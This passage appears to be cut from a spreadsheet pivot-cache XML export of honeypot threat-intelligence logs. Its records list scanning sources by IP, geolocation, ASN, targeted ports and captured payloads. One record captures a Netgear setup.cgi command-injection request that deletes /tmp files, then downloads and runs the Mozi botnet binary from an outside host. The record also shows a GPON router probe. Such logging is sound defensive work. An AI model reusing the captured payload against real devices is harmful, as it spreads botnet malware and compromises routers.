    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T00:26:57"/>
    <d v="2025-04-23T00:26:57"/>
    <d v="2025-04-23T00:26:57"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Mumbai"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb7:1b23"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1109"/>
    <x v="1109"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T00:19:28"/>
    <d v="2023-08-06T12:11:00"/>
    <d v="2025-04-23T00:19:28"/>
    <n v="54"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H27&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="25060&amp;&amp;1433&amp;&amp;445"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="GJ"/>
    <s v="Gujarat"/>
    <s v="Rajkot"/>
    <s v="Gondal (Radhakrishna Nagar)"/>
    <s v="1270994"/>
    <s v="360311"/>
    <s v="21.9615"/>
    <s v="70.7985"/>
    <s v="137118"/>
    <s v="Sparklink.Net Pvt Ltd"/>
    <s v="Sparklink Net Pvt Ltd"/>
    <s v="business"/>
    <s v="Sparklink.Net Pvt Ltd"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.111.110.185,61835)}&amp;&amp;{Data_SMB:Incoming connection (103.111.110.185,63343)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.111.110.185,53521)}&amp;&amp;{Data_SMB:Incoming connection (103.111.110.185,58039)}&amp;&amp;{Data_SMB:Incoming connection (103.111.110.185,61133)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.111.110.185,54812)}&amp;&amp;{Data_SMB:Incoming connection (103.111.110.185,60996)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.111.110.185,56265)}&amp;&amp;{Data_SMB:Incoming connection (103.111.110.185,56819)}&amp;&amp;{Data_SMB:Incoming connection (103.111.110.185,57222)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.111.110.185,64648)}&amp;&amp;{Data_SMB:Incoming connection (103.111.110.185,49587)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:676f:6eb9"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <s v="Port Scanner"/>
  </r>
  <r>
    <x v="1110"/>
    <x v="1110"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T00:16:16"/>
    <d v="2025-04-23T00:16:16"/>
    <d v="2025-04-23T00:16:16"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TR"/>
    <s v="Turkey"/>
    <s v="61"/>
    <s v="Trabzon"/>
    <s v="Ortahisar"/>
    <s v="Trabzon"/>
    <s v="738648"/>
    <s v="NA"/>
    <s v="41.0027"/>
    <s v="39.7168"/>
    <s v="16135"/>
    <s v="TURKCELL-AS"/>
    <s v="Turkcell Internet"/>
    <s v="corporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b2f2:1851"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1111"/>
    <x v="1111"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T00:14:25"/>
    <d v="2025-04-23T00:14:25"/>
    <d v="2025-04-23T00:14:25"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="43"/>
    <s v="Bà Rịa–Vũng Tàu Province"/>
    <s v="Thành Phố Vũng Tàu"/>
    <s v="Vũng Tàu"/>
    <s v="1562414"/>
    <s v="NA"/>
    <s v="10.346"/>
    <s v="107.084"/>
    <s v="45899"/>
    <s v="VNPT-AS-VN"/>
    <s v="VietNam Post and Telecom Corporation"/>
    <s v="corporate"/>
    <s v="Vietnam Posts and Telecommunications Group"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:71a6:786a"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1112"/>
    <x v="1112"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T00:05:49"/>
    <d v="2025-04-15T19:25:29"/>
    <d v="2025-04-23T00:05:49"/>
    <n v="4"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_HTTPS_HC1&amp;&amp;SMA-LAB_HTTPS_H26"/>
    <s v="8443&amp;&amp;443"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TR"/>
    <s v="Turkey"/>
    <s v="34"/>
    <s v="Istanbul"/>
    <s v="Pendik"/>
    <s v="Pendik"/>
    <s v="740616"/>
    <s v="NA"/>
    <s v="40.9111"/>
    <s v="29.3137"/>
    <s v="9121"/>
    <s v="Turk Telekomunikasyon Anonim Sirketi"/>
    <s v="Turk Telekomunikasyon A.S"/>
    <s v="business"/>
    <s v="TurkTelekom"/>
    <s v="1998-12-08"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;GET"/>
    <s v="{Data_HTTPS:{'Accept': 'text/plain,text/html', 'Host': '103.211.202.140', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTPS:{'Accept': 'text/plain,text/html', 'Host': '5.180.55.39', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:d49c:5fc6"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1113"/>
    <x v="1113"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-22T23:51:26"/>
    <d v="2025-04-22T23:51:26"/>
    <d v="2025-04-22T23:51:26"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>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d8:13ce"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1114"/>
    <x v="1114"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-22T23:50:01"/>
    <d v="2025-04-22T23:50:01"/>
    <d v="2025-04-22T23:50:01"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="NP"/>
    <s v="Nepal"/>
    <s v="P3"/>
    <s v="Bagmati Province"/>
    <s v="Kathmandu"/>
    <s v="Kathmandu (Jamal)"/>
    <s v="1283240"/>
    <s v="NA"/>
    <s v="27.7105"/>
    <s v="85.3146"/>
    <s v="4007"/>
    <s v="SUBISU-CABLENET-AS-AP"/>
    <s v="Ccnep"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67eb:c64e"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1115"/>
    <x v="1115"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-22T23:43:35"/>
    <d v="2025-04-22T23:43:35"/>
    <d v="2025-04-22T23:43:35"/>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3:1ff"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1116"/>
    <x v="1116"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-22T23:35:53"/>
    <d v="2025-03-06T14:47:40"/>
    <d v="2025-04-22T23:35:53"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H7"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="business"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b63c:e158"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1117"/>
    <x v="1117"/>
    <s v="88-177-165-19.subs.proxad.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-22T23:10:12"/>
    <d v="2024-12-23T20:44:35"/>
    <d v="2025-04-22T23:10:12"/>
    <n v="20"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H36"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="FR"/>
    <s v="France"/>
    <s v="ARA"/>
    <s v="Auvergne-Rhône-Alpes"/>
    <s v="Puy-de-Dôme"/>
    <s v="Clermont-Ferrand"/>
    <s v="3024635"/>
    <s v="63000"/>
    <s v="45.7807"/>
    <s v="3.0915"/>
    <s v="12322"/>
    <s v="Free SAS"/>
    <s v="ProXad network / Free SAS"/>
    <s v="residential"/>
    <s v="Proxad / Free SAS"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:58b1:a513"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1118"/>
    <x v="1118"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-22T22:45:27"/>
    <d v="2024-07-09T06:38:00"/>
    <d v="2025-04-22T22:45:27"/>
    <n v="11"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Execution-From-C&amp;C-Server-Exploit-Attempt&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_MT-CPA_H25&amp;&amp;abuse.ch&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_SSH_H5&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H24"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;30424&amp;&amp;NA&amp;&amp;80&amp;&amp;22"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="RI"/>
    <s v="Riau"/>
    <s v="Kampar Regency"/>
    <s v="Bangkinang"/>
    <s v="1650285"/>
    <s v="28411"/>
    <s v="0.33308699999999997"/>
    <s v="101.022"/>
    <s v="150982"/>
    <s v="Dinas Komunikasi, Informatika dan Persandian Kabupaten Kampar"/>
    <s v="Dinas Komunikasi, Informatika dan Persandian Kabupaten Kampar"/>
    <s v="business"/>
    <s v="Dinas Komunikasi"/>
    <s v="2023-04-17"/>
    <s v="IDNIC-DISKOMINFOKABUPATENKAMPAR-ID"/>
    <s v="None"/>
    <s v="connection&amp;&amp;GET&amp;&amp;POST"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'method': 'GET', 'uri': '/setup.cgi?next_file=netgear.cfg&amp;todo=syscmd&amp;cmd=rm+-rf+/tmp/*;wget+http://103.21.65.242:48342/Mozi.m+-O+/tmp/netgear;sh+netgear&amp;curpath=/&amp;currentsetting.htm=1'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Content-Length': '118', 'Host': '127.0.0.1:80', 'User-Agent': 'Hello, World', 'method': 'POST', 'uri': '/GponForm/diag_Form?images/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6715:41f2"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <s v="Scan Attempt"/>
  </r>
  <r>
    <x v="1119"/>
    <x v="1119"/>
    <s v="syn-098-152-200-003.biz.spectrum.com&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-22T22:38:07"/>
    <d v="2024-03-19T05:57:30"/>
    <d v="2025-04-22T22:38:07"/>
    <n v="383"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_REDIS_H10&amp;&amp;SMA-LAB_REDIS_H18&amp;&amp;SMA-LAB_REDIS_H35&amp;&amp;SMA-LAB_REDIS_H44&amp;&amp;SMA-LAB_SSH_H46&amp;&amp;SMA-LAB_HTTP_H2&amp;&amp;SMA-LAB_IPP_H23&amp;&amp;SMA-LAB_LDAP_H30&amp;&amp;SMA-LAB_SMB_H12&amp;&amp;SMA-LAB_PJL_H31&amp;&amp;SMA-LAB_HTTPS_H23&amp;&amp;SMA-LAB_SOCKS5_H26&amp;&amp;SMA-LAB_MT-CPA_H47&amp;&amp;SMA-LAB_REDIS_H27&amp;&amp;SMA-LAB_REDIS_H45&amp;&amp;SMA-LAB_REDIS_H34&amp;&amp;SMA-LAB_REDIS_H28&amp;&amp;SMA-LAB_REDIS_H8&amp;&amp;SMA-LAB_REDIS_H15&amp;&amp;SMA-LAB_REDIS_H9&amp;&amp;SMA-LAB_REDIS_H39&amp;&amp;SMA-LAB_REDIS_H6&amp;&amp;SMA-LAB_REDIS_H13&amp;&amp;SMA-LAB_REDIS_HC1&amp;&amp;SMA-LAB_REDIS_H7&amp;&amp;SMA-LAB_REDIS_H31&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_REDIS_H30&amp;&amp;SMA-LAB_REDIS_H32&amp;&amp;SMA-LAB_REDIS_H29&amp;&amp;SMA-LAB_SSH_H46&amp;&amp;SMA-LAB_MT-CPA_H4&amp;&amp;SMA-LAB_REDIS_H20&amp;&amp;SMA-LAB_MT-CPA_H34"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;6379&amp;&amp;22&amp;&amp;80&amp;&amp;631&amp;&amp;389&amp;&amp;445&amp;&amp;9100&amp;&amp;443&amp;&amp;1080&amp;&amp;32145&amp;&amp;13375&amp;&amp;22&amp;&amp;37751&amp;&amp;12315&amp;&amp;30490&amp;&amp;3589&amp;&amp;27177&amp;&amp;NA"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']}"/>
    <n v="68"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="CA"/>
    <s v="California"/>
    <s v="Orange"/>
    <s v="Brea"/>
    <s v="5330582"/>
    <s v="92821"/>
    <s v="33.9196"/>
    <s v="-117.882"/>
    <s v="20001"/>
    <s v="Charter Communications Inc"/>
    <s v="Spectrum"/>
    <s v="business"/>
    <s v="Trans Ocean Resources Management"/>
    <s v="2007-12-18"/>
    <s v="RRWE"/>
    <s v="2009-12-11"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_REDIS:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="1994-07-27 04:00:00"/>
    <s v="2025-07-26 04:00:00"/>
    <s v="2024-07-22 05:41:39"/>
    <s v="['NS1.CHARTER.COM', 'NS2.CHARTER.COM', 'NS3.CHARTER.COM', 'NS4.CHARTER.COM']"/>
    <s v="CSC Corporate Domains, Inc."/>
    <s v="['clientTransferProhibited https://icann.org/epp#clientTransferProhibited', 'serverDeleteProhibited https://icann.org/epp#serverDeleteProhibited', 'serverTransferProhibited https://icann.org/epp#serverTransferProhibited', 'serverUpdateProhibited https://icann.org/epp#serverUpdateProhibited', 'clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited', 'serverDeleteProhibited http://www.icann.org/epp#serverDeleteProhibited', 'serverTransferProhibited http://www.icann.org/epp#serverTransferProhibited', 'serverUpdateProhibited http://www.icann.org/epp#serverUpdateProhibited']"/>
    <s v="Domain Admin"/>
    <x v="19"/>
    <s v="NA"/>
    <s v="12405 Powerscourt Drive"/>
    <s v="::ffff:6298:c803"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1120"/>
    <x v="1120"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-22T22:24:48"/>
    <d v="2025-04-22T22:24:48"/>
    <d v="2025-04-22T22:24:48"/>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8:b3c3"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1121"/>
    <x v="1121"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-22T19:59:08"/>
    <d v="2025-03-07T08:03:25"/>
    <d v="2025-04-22T19:59:08"/>
    <n v="754"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H43"/>
    <s v="1433&amp;&amp;3389&amp;&amp;28059"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="102"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="PB"/>
    <s v="Punjab"/>
    <s v="Ludhiana"/>
    <s v="Ludhiana"/>
    <s v="1264728"/>
    <s v="141001"/>
    <s v="30.901"/>
    <s v="75.8573"/>
    <s v="17917"/>
    <s v="Quadrant Televentures Limited"/>
    <s v="Hfcl Infotel LTD"/>
    <s v="residential"/>
    <s v="Dayanand Medical College and Hospital"/>
    <s v="2009-02-11"/>
    <s v="DAYANAND_MEDICAL_COLLEGE_AND_HOSPITAL"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;stshash&amp;&amp;NA"/>
    <s v="{Data_MSSQl:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=hello'}}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:70c4:2c3"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1122"/>
    <x v="1122"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-22T19:44:50"/>
    <d v="2025-04-22T19:41:35"/>
    <d v="2025-04-22T19:44:50"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="3306&amp;&amp;1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="SG"/>
    <s v="Ho Chi Minh"/>
    <s v="NA"/>
    <s v="Ho Chi Minh City"/>
    <s v="1566083"/>
    <s v="NA"/>
    <s v="10.8231"/>
    <s v="106.63"/>
    <s v="45899"/>
    <s v="VNPT Corp"/>
    <s v="VNPT"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2008-11-04"/>
    <s v="VNPT-VN"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_MYSQL:NA}&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:71bf:8d49"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1123"/>
    <x v="1123"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-22T19:21:41"/>
    <d v="2025-04-22T19:21:41"/>
    <d v="2025-04-22T19:21:41"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
